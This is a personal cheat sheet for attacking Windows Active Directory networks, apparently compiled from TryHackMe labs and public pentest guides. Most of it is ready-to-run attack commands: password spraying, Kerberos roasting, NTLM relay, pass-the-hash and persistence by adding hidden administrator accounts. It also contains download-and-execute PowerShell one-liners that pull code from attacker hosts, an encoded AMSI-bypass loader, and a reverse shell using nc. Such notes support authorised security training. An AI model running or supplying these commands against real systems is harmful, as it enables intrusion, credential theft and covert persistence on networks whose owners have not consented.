These are my notes from the Active Directory networks at TryHackMe, as well as notes from other sources.
Inspo: E’s methodology, https://zer1t0.gitlab.io/posts/attacking_ad/, https://bitbin.it/SKZrPTcu/, https://book.hacktricks.xyz/windows-hardening/active-directory-methodology
Work in progress
Contents
- LOLBAS – Living off the land
- WADComs – Very useful cheatsheet
- Icebreaker
- AD Methodology
- Mindmap –
- Finding valid credentials
- Difference between ASREProast and Kerberoasting
- User enumeration
- Enumerating Active Directory with valid credentials/session
- Local Privilege Escalation
- Lateral movement with privileged creds/session
- Pivoting
- Post-exploitation with high privileged account
- You got domain admin, now what
LOLBAS – Living off the land
https://lolbas-project.github.io/
WADComs – Very useful cheatsheet
https://wadcoms.github.io/
Icebreaker
AD Methodology
- First step is to find valid credentials, that could either be a username, hashes or if lucky, username and password.
- Once you have access to target, enumerate AD. Relations between users, groups. Use BloodHound etc.
- Escalate privilege on local machine to local administrator
- Extract hashes if possile.
- Escalate to domain admin.
Mindmap –
https://tajdini.net/blog/penetration/active-directory-penetration-mind-map/
Finding valid credentials
Pentest network
See methodology
- Try exploit vulnerabilities on open ports
- Try extract credentials from open ports
Enumerate DNS
gobuster dns -d domain.local -t 25 -w /opt/Seclist/Discovery/DNS/subdomain-top2000.txtOSINT and Phishing
- Check public forums like Stack Overflow
- Check public repo on github
- Breached credentials. (Dehashed, intelx etc)
- Google dorking
Null and Guest access on SMB services
enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>
smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>
smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //NTLM Relay attack
NTLM relay is a technique that allows an attacker to intercept and forward NTLM authentication requests between a client and a server. The attacker can use this technique to gain access to the server or perform other actions on behalf of the client. For example, an attacker can use NTLM relay to dump the hashes of all domain users from a domain controller using DCSYNC.
Example: an attacker could use PetitPotam to force a domain controller to authenticate to a malicious server and then relay the NTLM request to another domain controller and perform a DCSync operation, which allows the attacker to dump all the password hashes from Active Directory. This could result in a complete takeover of the Windows domain.
https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py
This module performs the SMB Relay attacks originally discovered by cDc extended to many target protocols (SMB, MSSQL, LDAP, etc).
It receives a list of targets and for every connection received it will choose the next target and try to relay the credentials. Also, if specified, it will first to try authenticate against the client connecting to us.
It is implemented by invoking a SMB and HTTP Server
https://github.com/CCob/lsarelayx
lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on. lsarelayx will relay any incoming authentication request which includes SMB.
https://github.com/topotam/PetitPotam
PetitPotam is a technique that can be used to perform NTLM relay attacks against Windows servers, including domain controllers.
https://0xdf.gitlab.io/2019/01/13/getting-net-ntlm-hases-from-windows.html
Good explanation of NTLM relay.NTLM Authenticated Services
New Technology LAN Manager (NTLM) is the suite of security protocols used to authenticate users’ identities in AD.
def password_spray(self, password, url):
print ("[*] Starting passwords spray attack using the following password: " + password)
#Reset valid credential counter
count = 0
#Iterate through all of the possible usernames
for user in self.users:
#Make a request to the website and attempt Windows Authentication
response = requests.get(url, auth=HttpNtlmAuth(self.fqdn + "\\" + user, password))
#Read status code of response to determine if authentication was successful
if (response.status_code == self.HTTP_AUTH_SUCCEED_CODE):
print ("[+] Valid credential pair found! Username: " + user + " Password: " + password)
count += 1
continue
if (self.verbose):
if (response.status_code == self.HTTP_AUTH_FAILED_CODE):
print ("[-] Failed login with Username: " + user)
print ("[*] Password spray attack completed, " + str(count) + " valid credential pairs found")python ntlm_passwordspray.py -u <userfile> -f <fqdn> -p <password> -a <attackurl>
<userfile> - Textfile containing our usernames - "usernames.txt"
<fqdn> - Fully qualified domain name associated with the organisation that we are attacking - "za.tryhackme.com"
<password> - The password we want to use for our spraying attack - "Changeme123"
<attackurl> - The URL of the application that supports Windows Authentication - "http://ntlmauth.za.tryhackme.com"LDAP
See cheatsheet LDAP
LDAP authentication is similar to NTLM authentication. However, with LDAP authentication, the application directly verifies the user’s credentials. The application has a pair of AD credentials that it can use first to query LDAP and then verify the AD user’s credentials.
nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>ldapsearch -x -h 192.168.89.122 -b "dc=hutch,dc=offsec" > ldap.searchqueryLDAP Pass-back Attack
In an LDAP Pass-back attack, we can modify this IP to our IP and then test the LDAP configuration, which will force the device to attempt LDAP authentication to our rogue device.
# Setup rogue LDAP server
sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd
# Configure the rogue LDAP server
sudo dpkg-reconfigure -p low slapd
# Make rogue LDAP server vulnerable by downgrading the supporten authentication mechanism. Add this to a file called "olcSalSecProps.ldif":
#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
<EOF>
olcSaslSecProps: Specifies the SASL security properties
noanonymous: Disables mechanisms that support anonymous login
minssf: Specifies the minimum acceptable security strength with 0, meaning no protection.
# Now we can use the ldif file to patch our LDAP server using the following:
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart
# Verify rogue LDAP servers config
[kali@kali]$ ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms
dn:
supportedSASLMechanisms: PLAIN
supportedSASLMechanisms: LOGIN# Capturing LDAP Credentials. We will have to trigger the authenticaiton to go to our rogue LDAP server.
sudo tcpdump -SX -i eth0 tcp port 389Authentication Relays
Responder allows us to perform Man-in-the-Middle attacks by poisoning the responses during NetNTLM authentication, tricking the client into talking to you instead of the actual server they wanted to connect to. On a real LAN, Responder will attempt to poison any Link-Local Multicast Name Resolution (LLMNR), NetBIOS Name Servier (NBT-NS), and Web Proxy Auto-Discovery (WPAD) requests that are detected.
# https://github.com/lgandx/Responder
# Start responder
sudo responder -I tun0
# Downgrade NTLM authentication when possible. Allow capture NTLMv1 challenge and response.
#Remember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"
responder -I <Iface> --lm --disable-ess #Downgrade NTLM authntication if possible and force ESS downgradeMicrosoft Deployment Toolkit
Microsoft Deployment Toolkit (MDT) is a Microsoft service that assists with automating the deployment of Microsoft Operating Systems (OS).
Import-Module .\PowerPXE.ps1
$BCDFile = "conf.bcd"
Get-WimFile -bcdFile $BCDFile
Get-FindCredentials -WimFile pxeboot.wimDifference between ASREProast and Kerberoasting
https://luemmelsec.github.io/Kerberoasting-VS-AS-REP-Roasting/
AS_REP Roasting is taking place during the initial authentication procedure within Kerberos. It´s abusing the fact, that for accounts with the option Do not require Kerberos preauthentication set, there is no need to send the (normally required) encrypted timestamp (with the users password hash) at the very beginning. Thus everyone on the network who knows the name of an affected account may ask the KDC to authenticate as that user and in return fetch a AS_REP response which partly is encrypted with the AS_REP roastable account´s password hash. Once obtained, an attacker can try to offline crack the hash and fetch the cleartext credentials.
Kerberoasting aims at asking for service tickets related to services on the network where the SPNs are tied to user accounts, rather than computer accounts. The background here is that if a person creates a user he will choose the password most likely according to human standards i.e. a phrase, a word mixed with numbers, etc. If that password is weakly chosen, then it is possible to crack the hash and get the cleartext credentials.
During the process of asking to access a service on the network, the TGS will send a data package that contains a service ticket which is encrypted with the service-account´s password hash, that again like in the AS_REP roasting attack can be cracked offline.
User enumeration
When an invalid username is requested the server will respond using the Kerberos error code KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN
./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" <IP>
Nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='<domain>',userdb=/root/Desktop/usernames.txt <IP>
msf> use auxiliary/gather/kerberos_enumusers
crackmapexec smb dominio.es -u '' -p '' --users | awk '{print $4}' | uniqKnowing a userame(s)
ASREPRoast
The ASREPRoast attack looks for users without Kerberos pre-authentication required attribute (DONT_REQ_PREAUTH).
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast
That means that anyone can send an AS_REQ request to the DC on behalf of any of those users, and receive an AS_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.
# ENUMERATE VULNERABLE USERS (NEED DOMAIN CREDS)
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
------------------------------------------------------------------------
# REQUEST AS_REP MESSAGE
# Linux
# Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
# Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
# Windows
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
------------------------------------------------------------------------
# Cracking the hashes
john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
------------------------------------------------------------------------
# PERSISTENCE
# Force preauth not required for a user where you have GenericAll permissions (or permissions to write properties):
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -VerbosePassword spraying
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/password-spraying
Lists of common usernames could also be useful: https://github.com/insidetrust/statistically-likely-usernames
# PASSWORD POLICY
# Need valid creds
crackmapexec <IP> -u 'user' -p 'password' --pass-pol
enum4linx -u 'username' -p 'password' -P <IP>
(Get-DomainPolicy)."SystemAccess" #From powerview
------------------------------------------------------------------------
# LOCKOUT CHECK
# https://github.com/Greenwolf/Spray
# To prevent lockout it's best not to try with more than 5/7 passwords per account.
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
------------------------------------------------------------------------
# PASSWORD SPRAYING
crackmapexec smb <IP> -u users.txt -p passwords.txt
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>
# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
------------------------------------------------------------------------
# Crack hash
john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
------------------------------------------------------------------------
# Powershell passwordspraying script
https://github.com/dafthack/MSOLSpray
Import-Module MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020Enumerating Active Directory with valid credentials/session
Shell with credentials
If you have valid credentials you could try to get a shell.
To get shell with Administrator user and not with NT Authority\system, use WinExec or Evil-Winrm
# CrackMapExec
# Validate if credentials found is valide, and which protocol you can use to get a shell. {ssh,smb,mssql,winrm,ldap} Notice Pwn3d! with creds enox:california
crackmapexec winrm 192.168.204.165 -u enox -p california
WINRM 192.168.204.165 5985 NONE [+] None\enox:california (Pwn3d!)
# Can also be used to brute force
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes
# SSH - Port 22
# If SSH is open try to SSH to target
ssh user@target [-i id_rsa]
# WinRM - Port 5895, 5896
# If port 5985,5986 is open, try Evil-Winrm
gem install evil-winrm
evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.' -i <IP>/<Domain>
evil-winrm -u Administrator -H 'Use_hash_here' -i <IP>/<Domain>
winrs.exe -u:Administrator -p:Mypass123 -r:target cmd
# PTH-winexe
Basic syntax w/ credentials.
winexe -U <domain/username>%<password> //<targetIP> cmd.exe
Basic syntax w/ NTLM hash (pass the hash technique).
pth-winexe -U <domain/username>%<hash> //<targetIP> cmd.exe
# RDP - Port 3389
xrdp target
remmina
rdesktop target
# PSExec & SMBExec - Port 445
# Both options will create a new service (using \pipe\svcctl via SMB) in the victim machine and use it to execute something (psexec will upload an executable file to ADMIN$ share and smbexec will point to cmd.exe/powershell.exe and put in the arguments the payload --file-less technique--).
# If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
# PSExec with Powershel
$username = 'Administrator';
$password = 'Mypass123';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
Enter-PSSession -Computername TARGET -Credential $credential
# Powershell also includes the Invoke-Command cmdlet, which runs ScriptBlocks remotely via WinRM. Credentials must be passed through a PSCredential object as well:
Invoke-Command -Computername TARGET -Credential $credential -ScriptBlock {whoami}
# Remotely creat services using sc - port 135,445,139
sc.exe \\TARGET create AGservice binPath= "net user test test123 /add" start= auto
sc.exe \\TARGET start AGservice
# Stop or delete service
sc.exe \\TARGET stop AGservice
sc.exe \\TARGET delete AGservice
# Creating scheduled tasks remotely
schtasks /s TARGET /RU "SYSTEM" /create /tn "AGtask1" /tr "<command/payload to execute>" /sc ONCE /sd 01/01/1970 /st 00:00
schtasks /s TARGET /run /TN "AGtask1"
# /sc - Task will only run once. Starting date and time dosent matter because of this.
Shell – Changing user if you have a shell
# If you have a shell as a user, most likely runas command wont work because we cant type our password when prompted with typing our password. There are some tools you can try.
# Invoke-RunasCs.exe
# https://github.com/antonioCoco/RunasCs
.\RunasCs_net4.exe svc_mssql trustno1 cmd.exe -r 192.168.49.199:443
# RunAsUser.exe
# https://github.com/atthacks/RunAsUser
RunAsUser.exe -u superadmin -p funnyhtb -f c:\users\public\nc.exe -a '10.10.14.12 9001 -e cmd.exe'
# Try writing a ps1 script to use runas command
# cat runme.ps1
$secpasswd = ConvertTo-SecureString "trustno1" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("svc_msssql", $secpasswd)
$computer = "access.offsec"
[System.Diagnostics.Process]::Start("C:\xampp\htdocs\uploads\shell.exe","", $mycreds.Username, $mycreds.Password, $computer)
Basic commands
CMD
# https://book.hacktricks.xyz/windows-hardening/basic-cmd-for-pentesters#domain-info
# DOMAIN INFO
echo %USERDOMAIN% #Get domain name
echo %USERDNSDOMAIN% #Get domain name
echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller
set log #Get name of the domain controller
net groups /domain #List of domain groups
net group "domain computers" /domain #List of PCs connected to the domain
net view /domain #Lis of PCs of the domain
nltest /dclist:<DOMAIN> #List domain controllers
net group "Domain Controllers" /domain #List PC accounts of domains controllers
net group "Domain Admins" /domain #List users with domain admin privileges
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the grup "Domain Admins" is included here)
net user /domain #List all users of the domain
net user <ACCOUNT_NAME> /domain #Get information about that user
net accounts /domain #Password and lockout policy
nltest /domain_trust #Mapping of the trust relationships.
------------------------------------------------------------------------
# USERS
whoami /all #All info about me, take a look at the enabled tokens
whoami /priv #Show only privileges
net users #All users
dir /b /ad "C:\Users"
net user %username% #Info about a user (me)
net accounts #Information about password requirements
qwinsta #Anyone else logged in?
net user /add [username] [password] #Create user
#Lauch new cmd.exe with new creds (to impersonate in network)
runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
#Check current logon session as administrator using logonsessions from sysinternals
logonsessions.exe
logonsessions64.exe
------------------------------------------------------------------------
# GROUPS
#Local
net localgroup #All available groups
net localgroup Administrators #Info about a group (admins)
net localgroup administrators [username] /add #Add user to administrators
#Domain
net group /domain #Info about domain groups
net group /domain <domain_group_name> #Users that belongs to the group
------------------------------------------------------------------------
# PERSISTENCE WITH USERS
# Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN
# Add local user and put them local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD
# Add user to insteresting groups:
net localgroup "Remote Desktop Users" UserLoginName /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add
------------------------------------------------------------------------
# FIREWALL
netsh firewall show state # FW info, open ports
netsh advfirewall firewall show rule name=all
netsh firewall show config # FW info
Netsh Advfirewall show allprofiles
NetSh Advfirewall set allprofiles state off #Turn Off
NetSh Advfirewall set allprofiles state on #Trun On
netsh firewall set opmode disable #Turn Off
::How to open ports
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"
::Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #I found that this line is not needed
::sc config TermService start= auto #I found that this line is not needed
::net start Termservice #I found that this line is not needed
::Enable Remote assistance:
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable
::Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
::Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49PowerShell
# https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters
# Default PowerShell locations
C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
------------------------------------------------------------------------
# Basic PS commands to start
Get-Help * #List everything loaded
Get-Help process #List everything containing "process"
Get-Help Get-Item -Full #Get full helpabout a topic
Get-Help Get-Item -Examples #List examples
Import-Module <modulepath>
Get-Command -Module <modulename>
------------------------------------------------------------------------
# Download and Execute
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText
$wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1") $r = $wr.GetResponse() IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd(
------------------------------------------------------------------------
# Download and Exectute in background with AMSI Bypass
Start-Process -NoNewWindow powershell "-nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA="
------------------------------------------------------------------------
# Using Base64 from Linux
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0
powershell -nop -enc <BASE64_ENCODED_PAYLOAD>Download file from attacker to target
https://book.hacktricks.xyz/windows-hardening/basic-cmd-for-pentesters#domain-info
See my cheatsheet also.
# CMD
# Bitsadmin.exe
bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
# CertReq.exe
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
# Certutil.exe
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
# CrackMapExec
crackmapexec smb 172.16.251.152 -u user -p pass --put-file /tmp/whoami.txt \\Windows\\Temp\\whoami.txt
# Desktopimgdownldr.exe
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
# Diantz.exe
diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
# Esentutl.exe
esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
# Expand.exe
expand \\webdav\folder\file.bat c:\ADS\file.bat
# Extrac32.exe
extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
# Findstr.exe
findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
# Ftp.exe
cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
# GfxDownloadWrapper.exe
C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
# Hh.exe
HH.exe http://some.url/script.ps1
# Ieexec.exe
ieexec.exe http://x.x.x.x:8080/bypass.exe
# Makecab.exe
makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
# MpCmdRun.exe
MpCmdRun.exe -DownloadFile -url <URL> -path <path> //Windows Defender executable
# Replace.exe
replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
# Excel.exe
Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
# Powerpnt.exe
Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
# Squirrel.exe
squirrel.exe --download [url to package]
# Update.exe
Update.exe --download [url to package]
# Winword.exe
winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
# Wsl.exe
wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'# POWERSHELL
# System.Net.WebClient
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
# Invoke-WebRequest
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
# Wget
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
# BitsTransfer
Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
# OR
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
# Base64 Kali & EncodedCommand
kali> echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0
PS> powershell -EncodedCommand <Base64>adPEAS
https://github.com/61106960/adPEAS
adPEAS consists of the following enumeration modules:
- Domain – Searching for basic Active Directory information, like Domain Controllers, Sites und Subnets, Trusts and DCSync rights
- CA – Searching for basic Enterprise Certificate Authority information, like CA Name, CA Server and Templates
- Creds – Searching for different kind of credential exposure, like ASREPRoast, Kerberoasting, GroupPolicies, Netlogon scripts, LAPS, gMSA, certain account attributes, e.g. UnixPassword, etc.
- Delegation – Searching for delegation issues, like ‘Constrained Delegation’, ‘Unconstrained Delegation’ and ‘Resource Based Unconstrained Delegation’, for computer and user accounts
- Accounts – Searching for high privileged user accounts in predefined groups, account issues like e.g. password not expire
- Computer – Enumerating Domain Controllers, CA and Exchange server, with the switch -Vulns it checks the systems for EternalBlue, BlueKeep, ZeroLogon and critical Exchange vulnerabilities
- Bloodhound – Enumerating Active Directory with BloodHound
# Load adPEAS in PowerShell.
Import-Module .\adPEAS.ps1 # Method 1
. .\adPEAS.ps1 # Method 2
gc -raw .\adPEAS.ps1 | iex # Method 3
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/61106960/adPEAS/main/adPEAS.ps1') # Method 4
-----------------------------
# Start adPEAS with all enumeration modules and enumerate the domain the logged-on user and computer is connected to.
Invoke-adPEAS
#Start adPEAS with all enumeration modules and enumerate the domain 'contoso.com'.
Invoke-adPEAS -Domain 'contoso.com'
# Start adPEAS with all enumeration modules, enumerate the domain 'contoso.com' and use the domain controller 'dc1.contoso.com' for almost all enumeration requests.
Invoke-adPEAS -Domain 'contoso.com' -Server 'dc1.contoso.com'
# Start adPEAS with all enumeration modules, enumerate the domain 'contoso.com' and use the passed PSCredential object during enumeration.
$SecPassword = ConvertTo-SecureString 'Passw0rd1!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('contoso\johndoe', $SecPassword)
Invoke-adPEAS -Domain 'contoso.com' -Cred $Cred
# Start adPEAS with all enumeration modules, enumerate the domain 'contoso.com' and use the username 'contoso\johndoe' with password 'Passw0rd1!' during enumeration.
Invoke-adPEAS -Domain contoso.com -Username 'contoso\johndoe' -Password 'Passw0rd1!'PingCastle
# Ping Castle is a tool designed to assess quickly the Active Directory security level with a methodology based on risk assessment and a maturity framework.
# Simple healthcheck
./pingcastle.exe --user User1 --password Password1 --server domain.com --healthcheck BloodHound
https://github.com/BloodHoundAD/BloodHound
BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment.
- Run sharphound or bloodhound.py to collection data from target
- Transfer and import the zip files to bloodhound
- Analyze https://bloodhound.readthedocs.io/en/latest/data-analysis/bloodhound-gui.html
# INSTALL BLOODHOUND
# Install java
echo "deb http://httpredir.debian.org/debian stretch-backports main" | sudo tee -a /etc/apt/sources.list.d/stretch-backports.list
sudo apt-get update
# Install neo4j
wget -O - https://debian.neo4j.com/neotechnology.gpg.key | sudo apt-key add -
echo 'deb https://debian.neo4j.com stable 4.0' > /etc/apt/sources.list.d/neo4j.list
sudo apt-get update
apt-get install apt-transport-https
sudo apt-get install neo4j
systemctl stop neo4j
# Start neo4j
cd /usr/bin
./neo4j console
https://localhost:7474/
# Download the latest version of the BloodHound GUI from https://github.com/BloodHoundAD/BloodHound/releases
./BloodHound.bin --no-sandbox# INGESTOR
# Windows
# For PC joined to domain
./SharpHound.exe --CollectionMethod All
Invoke-BloodHound -CollectionMethod All
# Execute SharpHound using different creds
runas /netonly /user:domain\user "powershell.exe -exec bypass"
------------------------------------------------------------------------
# Python
# Need valid creds
https://github.com/fox-it/BloodHound.py
python3 bloodhound.py -u support -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local -c all -dc dc01.blackfield.local
python3 bloodhound.py -c All -d <DOMAIN> -u <USER> -p '<PASSWORD>' -ns <NAMESERVER IP> -dc <DOMAIN CONTROLLER>
# Through proxychains
proxychains bloodhound-python -u support -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local -c all --dns-tcpAdd Custom Queries to BloodHound
https://github.com/CompassSecurity/BloodHoundQueries/tree/master/BloodHound_Custom_Queries
# After adding the custome queries, they will show up under Analysis --> Custom Queries.
# On Linux, you can simply install the queries using this curl command:
curl -o ~/.config/bloodhound/customqueries.json "https://raw.githubusercontent.com/CompassSecurity/BloodHoundQueries/master/BloodHound_Custom_Queries/customqueries.json"
# On Windows, you can simply install the queries using this PowerShell command:
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/CompassSecurity/BloodHoundQueries/master/BloodHound_Custom_Queries/customqueries.json" -OutFile "$env:USERPROFILE\AppData\Roaming\bloodhound\customqueries.json"
LDAP with credentials
# https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#password-in-ad-user-comment
# https://book.hacktricks.xyz/windows-hardening/active-directory-methodology
# Look in the LDAP database, with ldapsearch or AdExplorer.exe to look for credentials in fields userPassword & unixUserPassword, or even for Description
# ENUMERATE
# https://devconnected.com/how-to-search-ldap-using-ldapsearch-examples/
